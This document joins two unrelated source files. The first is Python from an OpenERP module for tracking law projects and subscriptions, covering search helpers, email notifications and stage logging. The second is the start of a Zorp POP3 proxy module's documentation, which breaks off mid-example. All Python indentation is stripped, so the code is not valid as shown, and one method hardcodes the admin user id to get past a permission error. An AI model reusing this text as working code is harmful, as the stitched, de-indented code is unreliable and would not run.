user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, user_id, context=context)
partner_ids = []
if user.partner_id.is_company == True:
partner_ids = [user.partner_id.id]
elif user.partner_id.parent_id:
partner_ids = [user.partner_id.parent_id.id]
return partner_ids
def _get_subscritors(self, cr, uid, ids, name, arg, context=None):
subscription_obj = self.pool.get('law_tracking.subscription')
partner_ids = self.get_subscriber(cr, SUPERUSER_ID, uid, context)
subscription_ids = subscription_obj.search(cr, SUPERUSER_ID, [('law_project_id', 'in', ids), ('state','=','subscribed')])
res = dict((id, dict(subscriptor_ids=[], user_is_subscriptor=False, has_subscriptors=False)) for id in ids)
for subscription in subscription_obj.browse(cr, SUPERUSER_ID, subscription_ids):
res[subscription.law_project_id.id]['subscriptor_ids'].append(subscription.partner_id.id)
res[subscription.law_project_id.id]['has_subscriptors'] = (True)
# If user is subscriptor or is employee we say True!
if partner_ids and subscription.partner_id.id == partner_ids[0]:
res[subscription.law_project_id.id]['user_is_subscriptor'] = True
return res
def _user_is_employee(self, cr, uid, ids, name, arg, context=None):
res = {}
# We check if user is employee
user_obj = self.pool.get('res.users')
user_group_ids = user_obj.read(cr, SUPERUSER_ID, uid, fields=['groups_id'], context=context)
m = self.pool.get('ir.model.data')
employee_group_id = m.get_object(cr, SUPERUSER_ID, 'base', 'group_user').id
is_employee = False
if employee_group_id in user_group_ids['groups_id']:
is_employee = True
for i in ids:
res[i] = is_employee
return res
def _search_subscriptors(self, cr, uid, obj, name, args, context):
sub_obj = self.pool.get('law_tracking.subscription')
res = []
for field, operator, value in args:
assert field == name
# TOFIX make it work with not in
assert operator != "not in", "Do not search message_follower_ids with 'not in'"
sub_ids = sub_obj.search(cr, SUPERUSER_ID, [('partner_id', operator, value), ('state','=','subscribed')])
# sub_ids = sub_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('partner_id', operator, value)])
res_ids = [sub.law_project_id.id for sub in sub_obj.browse(cr, SUPERUSER_ID, sub_ids)]
res.append(('id', 'in', res_ids))
return res
def _search_user_is_subscriptor(self, cr, uid, obj, name, args, context):
res = []
for field, operator, value in args:
assert field == name
partner_ids = self.get_subscriber(cr, SUPERUSER_ID, uid, context=context)
if (operator == '=' and value) or (operator == '!=' and not value): # is a follower
law_project_ids = self.search(cr, SUPERUSER_ID, [('subscriptor_ids', 'in', partner_ids)], context=context)
else: # is not a follower or unknown domain
aux_ids = self.search(cr, SUPERUSER_ID, [('subscriptor_ids', 'in', partner_ids)], context=context)
law_project_ids = self.search(cr, SUPERUSER_ID, [('id', 'not in', aux_ids)], context=context)
res.append(('id', 'in', law_project_ids))
return res
def _search_has_subscriptors(self, cr, uid, obj, name, args, context):
res = []
sub_obj = self.pool.get('law_tracking.subscription')
for field, operator, value in args:
assert field == name
project_ids = []
if (operator == '=' and value) or (operator == '!=' and not value): # has subscriptors
sub_ids = sub_obj.search(cr, SUPERUSER_ID, [('state','=','subscribed')])
for sub in sub_obj.browse(cr, SUPERUSER_ID, sub_ids):
project_ids.append(sub.law_project_id.id)
else: # is not a follower or unknown domain
aux_ids = sub_obj.search(cr, SUPERUSER_ID, [('state','=','subscribed')], context=context)
for sub in sub_obj.browse(cr, SUPERUSER_ID, aux_ids):
project_ids.append(sub.law_project_id.id)
project_ids = self.search(cr, SUPERUSER_ID, [('id', 'not in', project_ids)], context=context)
res.append(('id', 'in', project_ids))
return res
# def _get_full_name(self, cr, uid, ids, prop, args, context=None):
# res = {}
# for line in self.browse(cr, uid, ids):
# res[line.id] = line.name + ' (' + line.reference + ') ' + ' - ' + line.legislature_id.name
# return res
def name_get(self, cr, uid, ids, context=None):
# always return the full hierarchical name
res = {}
for line in self.browse(cr, uid, ids):
res[line.id] = line.name + ' - ' + line.legislature_id.name
# res[line.id] = line.name + ' (' + line.reference + ') ' + ' - ' + line.legislature_id.name
# res = self._get_full_name(cr, uid, ids, 'full_name', None, context=context)
return res.items()
def name_search(self, cr, user, name='', args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
ids = set()
if name:
ids.update(self.search(cr, user, args + [('name',operator,name)], limit=(limit and (limit-len(ids)) or False) , context=context))
if not limit or len(ids) < limit:
ids.update(self.search(cr, user, args + [('reference',operator,name)], limit=limit, context=context))
if not limit or len(ids) < limit:
ids.update(self.search(cr, user, [('legislature_id.name','ilike',name)]+ args, limit=limit, context=context))
ids = list(ids)
else:
ids = self.search(cr, user, args, limit=limit, context=context)
result = self.name_get(cr, user, ids, context=context)
return result
def _get_user_subscription(self, cr, uid, ids, name, args, context=None):
subscription_obj = self.pool.get('law_tracking.subscription')
partner_ids = self.get_subscriber(cr, SUPERUSER_ID, uid, context)
subscription_ids = subscription_obj.search(cr, SUPERUSER_ID, [('law_project_id', 'in', ids), ('partner_id','in',partner_ids)])
res = {}
subscription_id = False
subscription_state = False
if subscription_ids:
subscription_id = subscription_ids[0]
subscription_state = subscription_obj.browse(cr, uid, subscription_ids[0], context).state
res = dict((id, dict(user_subscription_id=subscription_id, user_subscription_state=subscription_state)) for id in ids)
return res
_columns = {
'create_date': fields.datetime('Fecha de Creación', readonly=True),
'create_uid': fields.many2one('res.users', 'Creado por', readonly=True,),
'block_id': fields.related('presenter_id', 'partner_id', 'block_id', relation='law_tracking.block', type='many2one', string='Block', readonly=True),
'block_representatives_perc': fields.related('presenter_id','block_representatives_perc', string='Block Rep. %%',),
'block_representatives': fields.related('presenter_id','block_representatives', type='integer', string='Block Rep.', help='Block Representatives', readonly=True, ),
'total_members': fields.related('presenter_id','total_members', type='integer', string='Blocks Total.', readonly=True, ),
# 'block_id': fields.related('presenter_id', 'partner_id', 'block_id', relation='law_tracking.block', type='many2one', string='Block', readonly=True),
# 'full_name': fields.function(_get_full_name, type='char', string='Full Name', readonly=True),
'user_subscription_id': fields.function(_get_user_subscription, type='many2one', relation='law_tracking.subscription', string='Subscription', readonly=True, multi='_get_user_subscription'),
'user_subscription_state': fields.function(_get_user_subscription, type='selection', selection=[
# State machine: basic
('required','Required'),
('subscribed','Subscribed'),
('unsubscribed','Unsubscribed'),
('cancelled','Cancelled'),
],
string='Subscription State', multi='_get_user_subscription'),
'subscriptor_ids': fields.function(_get_subscritors, readonly=True,
fnct_search=_search_subscriptors, type='many2many',
obj='res.partner', string='Subscriptors', multi='_get_subscritors'),
'user_is_subscriptor': fields.function(_get_subscritors, type='boolean', string='User Is a Subscriptor', fnct_search=_search_user_is_subscriptor, multi='_get_subscritors'),
'user_is_employee': fields.function(_user_is_employee, type='boolean', string='User Is a Employee', method=True, readonly=False),
'has_subscriptors': fields.function(_get_subscritors, type='boolean', string='Has Subscriptors', fnct_search=_search_has_subscriptors, multi='_get_subscritors'),
'open': fields.boolean('Active', track_visibility='onchange'),
'law_category_ids': fields.many2many('law_tracking.category', 'project_law_category_rel', id1='law_project_id', id2='category_id', string='Categories', required=True,),
'law_category_ids_copy': fields.related('law_category_ids', type="many2many", relation='law_tracking.category', string="Categories", readonly=True, ),
'senators_treatment_detail_ids': fields.one2many('law_tracking.enclosure_treatment_detail', 'law_project_id', domain=[('order_paper_id.chamber','=','senators')], string='Order Papers'),
'enclosure_treatment_detail_ids': fields.one2many('law_tracking.enclosure_treatment_detail', 'law_project_id', string='Order Papers'),
'sen_commission_treatment_ids': fields.one2many('law_tracking.commission_treatment', 'law_project_id', string='Senators Commission Treatment', required=True, domain=[('partner_id.chamber','=','senators')]),
# 'filtered_message_ids': fields.one2many('mail.message', 'res_id',
# domain=lambda self: [('model', '=', self._name),('type','=','notification')],
# auto_join=True,
# string='Messages',
# help="Messages and communication history"),
'sequence': fields.integer('Sequence'),
'legislature_type': fields.related('legislature_id','type', type='char', ),
'law_project_type_id': fields.many2one('law_tracking.project.type', 'Entrance Chamber', domain="[('unicameral','=',False)]", ondelete='set null', ),
# Should change the domain when statusbar widget form trunk relase (folded shown differently)
'copy_stage_id': fields.related('stage_id', type="many2one", relation='law_tracking.stage', string='Stage', readonly=True, domain="['&', ('fold', '=', False), ('law_project_ids', '=', law_project_type_id)]"),
'stage_id': fields.many2one('law_tracking.stage', 'Stage',
domain="[('law_project_ids', '=', law_project_type_id)]", track_visibility="onchange"),
'presented_by': fields.selection([
('legislator', 'Legislator'),
('executive', 'Executive'),
('judiciary', 'Judiciary'),
('popular_initiative', 'Popular Initiative'),
('other', 'Otros'),
], string='Presented By',
required=True,),
}
def copy(self, cr, uid, id, default=None, context=None, done_list=None, local=False):
default = {} if default is None else default.copy()
law_project_rec = self.browse(cr, uid, id, context=context)
# default.update(reference=_("%s (copy)") % (law_project_rec['reference'] or ''))
default.update(reference=_("(copy)"))
default.update(name=_("(copy)"))
default.update(enclosure_treatment_detail_ids=[])
default.update(log_ids=[])
default.update(sen_commission_treatment_ids=[])
default.update(dep_commission_treatment_ids=[])
default.update(law_project_document_ids=[])
default.update(subscription_ids=[])
# default.update(reference=False)
# default.update(name=False)
return super(law_project, self).copy(cr, uid, id, default, context=context)
# Not implemented yet
# we supose that 'folded' is same as not active
def check_parlamentary_status_lost(self, cr, uid, ids=None, context=None):
if context is None:
context = {}
# date = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
date = (datetime.now() - relativedelta.relativedelta(years=2)).strftime("%Y-%m-%d")
# date = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
# new_date = datetime.now() + timedelta(months=2)
# + timedelta(days=365))
# datetime.strftime(datetime.now() + timedelta, tools.DEFAULT_SERVER_DATE_FORMAT)
# wf_service = netsvc.LocalService("workflow")
# ids = self.search(cr, uid, [('expiration_date','<=',date)])
ids = self.search(cr, uid, [('stage_id.state','=', 'open'),('entry_date','<=',date)])
# for record in self.browse(cr, uid, ids, context):
stage_ids = self.pool.get('law_tracking.stage').search(cr, uid, [('state','=','pending')])
if ids and stage_ids:
# stage
vals = {'stage_id': stage_ids[0]}
self.write(cr, uid, ids, vals, context=context)
# wf_service.trg_validate(uid, 'nautical.contract', record.id, 'sgn_expired', cr)
# print record.craft_id.id
# wf_service.trg_validate(uid, 'nautical.craft', record.craft_id.id, 'sgn_expired', cr)
return True
# return res
def _read_group_stage_ids(self, cr, uid, ids, domain, read_group_order=None, access_rights_uid=None, context=None):
stage_obj = self.pool.get('law_tracking.stage')
order = stage_obj._order
access_rights_uid = access_rights_uid or uid
if read_group_order == 'stage_id desc':
order = '%s desc' % order
search_domain = []
project_id = self._resolve_project_id_from_context(cr, uid, context=context)
if project_id:
search_domain += ['|', ('law_project_ids', '=', project_id)]
search_domain += [('id', 'in', ids)]
stage_ids = stage_obj._search(cr, uid, search_domain, order=order, access_rights_uid=access_rights_uid, context=context)
result = stage_obj.name_get(cr, access_rights_uid, stage_ids, context=context)
# restore order of the search
result.sort(lambda x,y: cmp(stage_ids.index(x[0]), stage_ids.index(y[0])))
fold = {}
for stage in stage_obj.browse(cr, access_rights_uid, stage_ids, context=context):
fold[stage.id] = stage.fold or False
return result, fold
_group_by_full = {
'stage_id': _read_group_stage_ids,
}
# We make this default because on creation employee should see all the fields
_defaults = {
'user_is_employee':True,
'presented_by': 'legislator',
}
_sql_constraints = [
('reference_uniq', 'unique(reference)', 'Reference must be unique'),
]
def stage_find(self, cr, uid, cases, section_id, domain=[], order='sequence', context=None):
""" Override of the base.stage method
Parameter of the stage search taken from the lead:
- section_id: if set, stages must belong to this section or
be a default stage; if not set, stages must be default
stages
"""
if isinstance(cases, (int, long)):
cases = self.browse(cr, uid, cases, context=context)
# collect all section_ids
section_ids = []
if section_id:
section_ids.append(section_id)
for task in cases:
if task.project_id:
section_ids.append(task.project_id.id)
search_domain = []
if section_ids:
search_domain = [('|')] * (len(section_ids) - 1)
for section_id in section_ids:
search_domain.append(('law_project_ids', '=', section_id))
search_domain += list(domain)
stage_ids = self.pool.get('law_tracking.stage').search(cr, uid, search_domain, order=order, context=context)
if stage_ids:
return stage_ids[0]
return False
def onchange_presenter(self, cr, uid, ids, presenter_id, context=None):
v = {}
if context is None:
context = {}
if presenter_id:
legislature_member_obj = self.pool.get('law_tracking.legislature_member')
legislature_member = legislature_member_obj.browse(cr, uid, presenter_id, context=context)
if not legislature_member:
return {'value': v}
if isinstance(legislature_member, list):
legislature_member = legislature_member[0]
v['block_id'] = legislature_member.block_id.id
v['block_representatives_perc'] = legislature_member.block_representatives_perc
v['total_members'] = legislature_member.total_members
v['block_representatives'] = legislature_member.block_representatives
# project_type_unicameral = self.pool.get('law_tracking.project.type').search(cr,uid,[('unicameral','=',True)])
else:
v['block_id'] = False
v['block_representatives_perc'] = False
v['total_members'] = False
v['block_representatives'] = False
return {'value': v}
def onchange_legislature(self, cr, uid, ids, legislature_id, context=None):
v = {}
if context is None:
context = {}
if legislature_id:
legislature_obj = self.pool.get('law_tracking.legislature')
legislature = legislature_obj.browse(cr, uid, legislature_id, context=context)
if not legislature:
return {'value': v}
if isinstance(legislature, list):
legislature = legislature[0]
v['legislature_type'] = legislature.type
project_type_unicameral = self.pool.get('law_tracking.project.type').search(cr,uid,[('unicameral','=',True)])
if legislature.type == 'unicameral' and project_type_unicameral:
v['law_project_type_id'] = project_type_unicameral[0]
else:
v['law_project_type_id'] = False
else:
v['legislature_type'] = False
v['law_project_type_id'] = False
return {'value': v}
def onchange_type(self, cr, uid, ids, law_project_type_id, context=None):
v = {}
if context is None:
context = {}
if law_project_type_id:
law_project_type_obj = self.pool.get('law_tracking.project.type')
law_project_type = law_project_type_obj.browse(cr, uid, law_project_type_id, context=context)
if not law_project_type:
return {'value': v}
if isinstance(law_project_type, list):
law_project_type = law_project_type[0]
order='sequence'
stage_ids = self.pool.get('law_tracking.stage').search(cr, uid, [('law_project_ids', '=', law_project_type.id)], order=order, context=context)
v['stage_id'] = stage_ids[0] or False
else:
v['stage_id'] = False
return {'value': v}
def check_suggestions(self, cr, uid, ids, context=None):
if not context:
context = {}
partner_obj = self.pool.get('res.partner')
company_obj = self.pool.get('res.company').browse(cr, uid, 1, context)
template = False
try:
template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'project_suggestion_mail')
except ValueError:
raise
for law_project in self.browse(cr, uid, ids, context=context):
partner_match_ids = []
partner_ids = partner_obj.search(cr, uid, [('id','not in',[x.id for x in law_project.subscriptor_ids])])
for partner in partner_obj.browse(cr, uid, partner_ids, context=context):
partner_categ_ids = [x.id for x in partner.law_category_ids]
for law_categ in law_project.law_category_ids:
if law_categ.id in partner_categ_ids:
partner_match_ids.append(partner.id)
break
try:
ctx_partner_ids = ', '.join(str(x) for x in partner_match_ids)
context = dict(context, partner_ids=ctx_partner_ids)
context = dict(context, company_obj=company_obj)
self.pool.get('email.template').send_mail(cr, uid, template.id, law_project.id, force_send=True, raise_exception=True, context=context)
except Exception:
raise
break
partner_names = ''
for partner in partner_obj.browse(cr, uid, partner_match_ids, context=context):
partner_names += partner.name + ', '
return self.pool.get('warning_box').info(cr, uid, title=_('Suggestions Sent'), message=_('Suggestions has been sent to: ' + partner_names))
def require_more_information(self, cr, uid, ids, context=None):
uid = 1 #porque este mail lo mandan usuarios portal y si no da error
if not context:
context = {}
# partner_obj = self.pool.get('res.partner')
# company_obj = self.pool.get('res.company').browse(cr, uid, 1, context)
template = False
try:
template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'law_project_more_information_request')
except ValueError:
raise
for law_project in self.browse(cr, uid, ids, context=context):
try:
self.pool.get('email.template').send_mail(cr, uid, template.id, law_project.id, force_send=True, raise_exception=True, context=context)
except Exception:
raise
return self.pool.get('warning_box').info(cr, uid, title=_('Information Requested'), message=_('More information has been requested.'))
# def check_suggestions_old_modified(self, cr, uid, ids, context=None):
# if not context:
# context = {}
# partner_obj = self.pool.get('res.partner')
# template = False
# signature_template = False
# # New for using partner to send email. TODO: improove this!! is horrible!
# partner_obj = self.pool.get('res.partner')
# try:
# template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'project_suggestion_mail')
# signature_template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'company_signature')
# except ValueError:
# raise
# user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
# signature_mail = self.pool.get('email.template').generate_email(cr, uid, signature_template.id, user.company_id.id, context=context)
# for law_project in self.browse(cr, uid, ids, context=context):
# partner_match_ids = []
# partner_ids = partner_obj.search(cr, uid, [('id','not in',[x.id for x in law_project.subscriptor_ids])])
# for partner in partner_obj.browse(cr, uid, partner_ids, context=context):
# partner_categ_ids = [x.id for x in partner.law_category_ids]
# for law_categ in law_project.law_category_ids:
# if law_categ.id in partner_categ_ids:
# data = {
# 'partner_id': partner.id,
# 'law_project_id': law_project.id,
# }
# partner_match_ids.append(partner.id)
# # New for using partner to send email. TODO: improove this!! is horrible!
# try:
# mail = self.pool.get('email.template').generate_email(cr, uid, template.id, law_project.id, context=context)
# subtype = 'mail.mt_comment'
# body_html = mail['body_html']
# body_html = tools.append_content_to_html(mail['body_html'], signature_mail['body_html'], plaintext=False, container_tag='div')
# # partner_obj.message_post(cr, uid, [partner.id], subject=mail['subject'],
# # body=body_html, type='comment', subtype=subtype, context=context, partner_ids = [partner.id])
# # context.update['recipient_ids'] = [partner.id]
# self.pool.get('email.template').send_mail(cr, uid, template.id, law_project.id, force_send=True, raise_exception=True, context=context)
# except Exception:
# raise
# break
# # wE REPLACE THIW FOR THE "NEW"
# ## We write a notification and send this partner in context to notify them
# # context = dict(context, partner_match_ids=partner_match_ids)
# # res = self.write_comment(cr, uid, [law_project.id], 'law_tracking_x', 'project_suggestion_mail', context=context)
# # TODO el mensaje de a quien se le envio tendria que tener en cuenta si hay mas de un proyecto en el bucle del for
# partner_names = ''
# for partner in partner_obj.browse(cr, uid, partner_match_ids, context=context):
# partner_names += partner.name + ', '
# return self.pool.get('warning_box').info(cr, uid, title=_('Suggestions Sent'), message=_('Suggestions has been sent to: ' + partner_names))
def write_comment(self, cr, uid, ids, module, rec_id, context=None):
""" write comment and send email """
if not context:
context = {}
# With this option we disable the signature on the email of the user that is sending the email. It also changes the footer from:
# Sent by Law Tracking using OpenERP. Access your messages and documents through our Customer Portal
# to
# Access your messages and documents through our Customer Portal
context = dict(context, mail_notify_user_signature=False)
# context = dict(context, lang='es_ES')
template = False
signature_template = False
try:
template = self.pool.get('ir.model.data').get_object(cr, uid, module, rec_id)
signature_template = self.pool.get('ir.model.data').get_object(cr, uid, 'law_tracking_x', 'company_signature')
except ValueError:
raise
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
if 'lang' not in context:
if user.lang:
context = dict(context, lang=user.lang)
signature_mail = self.pool.get('email.template').generate_email(cr, uid, signature_template.id, user.company_id.id, context=context)
partner_match_ids = context.get('partner_match_ids', [])
for law_project in self.browse(cr, uid, ids, context):
try:
mail = self.pool.get('email.template').generate_email(cr, uid, template.id, law_project.id, context=context)
subtype = 'mail.mt_comment'
body_html = mail['body_html']
body_html = tools.append_content_to_html(mail['body_html'], signature_mail['body_html'], plaintext=False, container_tag='div')
self.message_post(cr, uid, [law_project.id], subject=mail['subject'],
body=body_html, type='comment', subtype=subtype, context=context, partner_ids = partner_match_ids)
except Exception:
raise
def get_selection_item(self, cr, uid, ids, obj=None, model=None, field=None, context=None):
if context == None:
context = {}
ret = ''
if obj and field and model:
field_val = getattr(obj, field)
try:
ret = dict(self.pool.get(model).fields_get(cr, uid, allfields=[field], context=context)[field]['selection'])[field_val]
except Exception:
return ''
return ret
def get_treatment(self, cr, uid, ids, example_id=False, context=None):
if not context:
context = {}
order_paper_ids = context.get('order_paper_ids', False)
order_paper_obj = self.pool.get('law_tracking.order_paper')
treatment_detail_obj = self.pool.get('law_tracking.treatment_detail')
enclosure_treatment_detail_obj = self.pool.get('law_tracking.enclosure_treatment_detail')
ret = False
if not order_paper_ids and example_id:
order_paper_ids = example_id
if order_paper_ids:
order_paper = order_paper_obj.browse(cr, uid, order_paper_ids, context=context)[0]
if order_paper.type == 'commission':
treatment_detail_ids = treatment_detail_obj.search(cr, uid, [('order_paper_id','in', order_paper_ids),('law_project_id','in',ids)], context=context)
if treatment_detail_ids:
# There should be only one treatment for an order paper and a law_project
ret = treatment_detail_obj.browse(cr, uid, treatment_detail_ids, context=context)[0]
elif order_paper.type == 'enclosure':
eclosure_treatment_detail_ids = enclosure_treatment_detail_obj.search(cr, uid, [('order_paper_id','in', order_paper_ids),('law_project_id','in',ids)], context=context)
if eclosure_treatment_detail_ids:
# There should be only one treatment for an order paper and a law_project
ret = enclosure_treatment_detail_obj.browse(cr, uid, eclosure_treatment_detail_ids, context=context)[0]
return ret
def require_subscription(self, cr, uid, ids, context=None):
if not context:
context = {}
subscription_obj = self.pool.get('law_tracking.subscription')
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
partner_ids = self.get_subscriber(cr, SUPERUSER_ID, uid, context)
if not partner_ids:
raise osv.except_osv(_('No partner type "is company" related for current user!'),_('User must belong to a partner tipe "Is Company"'))
ret = []
wf_service = netsvc.LocalService("workflow")
for law_project in self.browse(cr, uid, ids, context=context):
subscription_data = {
'price': 0,
'law_project_id': law_project.id,
'partner_id': partner_ids[0],
}
if not law_project.user_subscription_id:
# we create it with admin user so it can add subscriptors
# subscription_id = subscription_obj.create(cr, 1, subscription_data, context=context)
subscription_id = subscription_obj.create(cr, uid, subscription_data, context=context)
else:
subscription_id = law_project.user_subscription_id.id
wf_service.trg_validate(uid, 'law_tracking.subscription', subscription_id, 'sgn_require', cr)
ret.append(subscription_id)
return ret
def unsubscribe(self, cr, uid, ids, context=None):
if not context:
context = {}
subscription_obj = self.pool.get('law_tracking.subscription')
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
partner_ids = []
if user.partner_id.is_company == True:
partner_ids.append(user.partner_id.id)
for x in user.partner_id.child_ids:
partner_ids.append(x.id)
elif user.partner_id.parent_id:
partner_ids.append(user.partner_id.parent_id.id)
for x in user.partner_id.parent_id.child_ids:
partner_ids.append(x.id)
wf_service = netsvc.LocalService("workflow")
self.message_unsubscribe(cr, SUPERUSER_ID, ids, partner_ids, context=context)
subscription_ids = self.pool.get('law_tracking.subscription').search(cr, uid, [('law_project_id','in',ids), ('partner_id', 'in', partner_ids), ('state','=','subscribed')])
for subscription in subscription_ids:
wf_service.trg_validate(SUPERUSER_ID, 'law_tracking.subscription', subscription, 'sgn_unsubscribe', cr)
return True
def format_date(self, cr, uid, ids, date, format, context):
# date = datetime.strptime(date, "%Y-%m-%d %H:%M:%S")
format_date = datetime.strftime(datetime.strptime(date, tools.DEFAULT_SERVER_DATE_FORMAT) , format)
# format_date = datetime.strftime(datetime.strptime(date, tools.DEFAULT_SERVER_DATE_FORMAT) , format)
return format_date
def write(self, cr, uid, ids, vals, context=None):
if 'stage_id' in vals:
self.write_log(cr, uid, ids, vals, context=context)
ret = super(law_project, self).write(cr, uid, ids, vals, context=context)
if 'stage_id' in vals:
self.write_comment(cr, uid, ids, 'law_tracking_x', 'project_status_change_mail', context=context)
return ret
def write_log(self, cr, uid, ids, vals, context=None):
for law_project in self.browse(cr, uid, ids, context=context):
new_stage = vals['stage_id']
date = context.get('log_date', fields.datetime.now())
new_vals = {
'user_id': uid,
'date': date,
'name': "%s --> %s" % (
law_project.stage_id.name or '',
self.pool.get('law_tracking.stage').browse(
cr, uid, new_stage, context=context).name or ''),
'law_project_id': law_project.id,
}
self.pool.get('law_tracking.log').create(cr, uid, new_vals, context=context)
return True
def get_actual_project_url(self, cr, uid, ids, context=None):
assert len(ids) == 1
action = 'portal_law_tracking.action_portal_law_project_unsubscribed_law_projects'
view_type='form'
res_id = self.browse(cr, uid, ids[0], context=context).id
ret = self.get_resource_url(cr, uid, ids, action=action, view_type=view_type, res_id=res_id)
return ret
def get_resource_url(self, cr, uid, ids, action='login', view_type=None, menu_id=None, res_id=None, model=None, context=None):
""" generate a signup url for the given partner ids and action, possibly overriding
the url state components (menu_id, id, view_type) """
if context is None:
context= {}
res = dict.fromkeys(ids, False)
base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
query = {'db': cr.dbname}
fragment = {'action': action,}
if view_type:
fragment['view_type'] = view_type
if menu_id:
fragment['menu_id'] = menu_id
if model:
fragment['model'] = model
if res_id:
fragment['id'] = res_id
res = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
return res
|
############################################################################
##
## Copyright (c) 2000-2015 BalaBit IT Ltd, Budapest, Hungary
## Copyright (c) 2015-2018 BalaSys IT Ltd, Budapest, Hungary
##
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program; if not, write to the Free Software Foundation, Inc.,
## 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##
############################################################################
"""<module maturity="stable">
<summary>
Proxy for the Post Office Protocol version 3.
</summary>
<description>
<para>
The Pop3 module defines the classes constituting the proxy for the POP3 protocol.
</para>
<section>
<title>The POP3 protocol</title>
<para>
Post Office Protocol version 3 (POP3) is usually used by mail
user agents (MUAs) to download messages from a remote mailbox. POP3
supports a single mailbox only, it does not support advanced multi-mailbox operations
offered by alternatives such as IMAP.
</para>
<para>
The POP3 protocol uses a single TCP connection to give access to a
single mailbox. It uses a simple command/response based approach, the
client issues a command and a server can respond either positively
or negatively.
</para>
<section>
<title>Protocol elements</title>
<para>
The basic protocol is the following: the client issues a request (also called
command in POP3 terminology) and the server responds with the
result. Both commands and responses are line based, each command is
sent as a complete line, a response is either a single line or - in case of
mail transfer commands - multiple lines.
</para>
<para>
Commands begin with a case-insensitive keyword possibly followed
by one or more arguments (such as RETR or DELE).
</para>
<para>
Responses begin with a status indicator ("+OK" or "-ERR") and a
possible explanation of the status code (e.g.: "-ERR
Permission denied.").
</para>
<para>
Responses to certain commands (usually mail transfer commands) also
contain a data attachment, such as the mail body. See the <xref linkend="pop3_bulktransfer"/> for further details.
</para>
</section>
<section>
<title>POP3 states</title>
<para>
The protocol begins with the server displaying a greeting message,
usually containing information about the server.
</para>
<para>
After the greeting message the client takes control and the protocol
enters the AUTHORIZATION state where the user has to pass credentials
proving his/her identity.
</para>
<para>
After successful authentication the protocol enters
TRANSACTION state where mail access commands can be issued.
</para>
<para>
When the client has finished processing, it issues a QUIT command
and the connection is closed.
</para>
</section>
<section xml:id="pop3_bulktransfer">
<title>Bulk transfers</title>
<para>
Responses to certain commands (such as LIST or RETR) contain a long
data stream. This is transferred as a series of lines, terminated by
a "CRLF '.' CRLF" sequence, just like in SMTP.
</para>
<example>
<title>POP3 protocol sample</title>
<synopsis>+OK POP3 server ready
USER account
+OK User name is ok
PASS password
+OK Authentication successful
LIST
+OK Listing follows
1 5758
2 232323
3 3434
.
RETR 1
+OK Mail body follows
From: [email protected]
To: [email protected]
Subject: sample mail
This is a sample mail message. Lines beginning with
..are escaped, another '.' character is perpended which
is removed when the mail is stored by the client.
.
DELE 1
+OK Mail deleted
QUIT
+OK Good bye</synopsis>
</example>
</section>
</section>
<section>
<title>Proxy behavior</title>
<para>
Pop3Proxy is a module built for parsing messages of the POP3 protocol. It reads and parses COMMANDs on the client side, and sends them to the server if the local security policy permits. Arriving RESPONSEs are parsed as well, and sent to the client if the local security policy permits. It is possible to manipulate both the requests and the responses.
</para>
<section>
<title>Default policy for commands</title>
<para>
By default, the proxy accepts all commands recommended in RFC 1939. Additionally, the
following optional commands are also accepted: USER, PASS, AUTH. The proxy understands all the commands specified in RFC 1939 and the AUTH command. These additional commands can be enabled manually.
</para>
</section>
<section xml:id="pop3_policies">
<title>Configuring policies for POP3 commands</title>
<para>
Changing the default behavior of commands can be done using the
hash named <parameter>request</parameter>. The hash is indexed by the command name
(e.g.: USER or AUTH). See <xref linkend="proxy_policies"/> for details.
</para>
<inline type="actiontuple" target="action.pop3.req"/>
<example>
<title>Example for allowing only APOP authentication in POP3</title>
<para>
This sample proxy class rejects the USER authentication requests, but allows APOP requests.
</para>
<synopsis>class APop3(Pop3Proxy):
def config(self):
Pop3Proxy.config(self)
self.request["USER"] = (POP3_REQ_REJECT)
self.request["APOP"] = (POP3_REQ_ACCEPT)</synopsis>
</example>
<example>
<title>Example for converting simple USER/PASS authentication to APOP in POP3</title>
<para>
The above example simply rejected USER/PASS authentication, this one converts USER/PASS authentication to APOP authentication messages.
</para>
<synopsis>class UToAPop3(Pop3Proxy):
def config(self):
Pop3Proxy.config(self)
self.request["USER"] = (POP3_REQ_POLICY,self.DropUSER)
self.request["PASS"] = (POP3_REQ_POLICY,self.UToA)
def DropUSER(self,command):
self.response_value = "+OK"
self.response_param = "User ok Send Password"
return POP3_REQ_REJECT
def UToA(self,command):
# Username is stored in self->username,
# password in self->request_param,
# and the server timestamp in self->timestamp,
# consequently the digest can be calculated.
# NOTE: This is only an example, calcdigest must be
# implemented separately
digest = calcdigest(self->timestamp+self->request_param)
self->request_command = "APOP"
self->request_param = name + " " + digest
return POP3_REQ_ACCEPT</synopsis>
</example>
</section>
<section>
<title>Rewriting the banner</title>
<para>
As in many other protocols, POP3 also starts with a server banner.
This banner contains the protocol version the server uses, the
possible protocol extensions that it supports and, in many situations,
the vendor and exact version number of the POP3 server.
</para>
<para>
This information is useful only if the clients connecting to the POP3
server can be trusted, as it might make bug hunting somewhat easier.
On the other hand, this information is also useful for attackers when
targeting this service.
</para>
<para>
To prevent this, the banner can be replaced with a neutral one.
Use the <parameter>request</parameter> hash with the 'GREETING' keyword as shown in the following example.
</para>
<example>
<title>Rewriting the banner in POP3</title>
